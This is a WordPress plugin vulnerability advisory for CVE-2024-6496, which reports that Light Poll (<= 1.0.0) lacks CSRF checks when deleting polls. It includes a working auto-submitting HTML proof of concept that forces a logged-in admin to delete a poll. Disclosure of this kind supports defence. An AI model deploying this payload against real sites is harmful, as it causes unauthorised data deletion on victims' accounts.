Light Poll <= 1.0.0 – Polls Deletion via CSRF | CVE 2024-6496 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks when deleting polls, which could allow attackers to make logged in users perform such action via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="http://localhost/wp-admin/admin.php">
      <input type="hidden" name="page" value="lp&#95;settings" />
      <input type="hidden" name="task" value="remove" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Vuln Seeker Cybersecurity Team

Submitter

Vuln Seeker Cybersecurity Team

Submitter website

http://vulnseeker.org

Verified

Yes

WPVDB ID

d598eabd-a87a-4e3e-be46-a5c5cc3f130e

Timeline

Publicly Published

2024-07-11 (about 1 year ago)

Added

2024-07-11 (about 1 year ago)

Last Updated

2024-07-11 (about 1 year ago)

Other

Published

Title

Published

2024-12-12

Title

Mandrill WP <= 1.0.5 - Cross-Site Request Forgery

Published

2022-10-12

Title

Shortcodes Ultimate < 5.12.1 - Stored XSS via CSRF

Published

2024-01-05

Title

WooCommerce < 8.3.0 - Cross-Site Request Forgery

Published

2022-09-29

Title

AdminPad < 2.2 - Note Update via CSRF

Published

2024-12-02

Title

Paloma Widget <= 1.14 - Cross-Site Request Forgery to Stored Cross-Site Scripting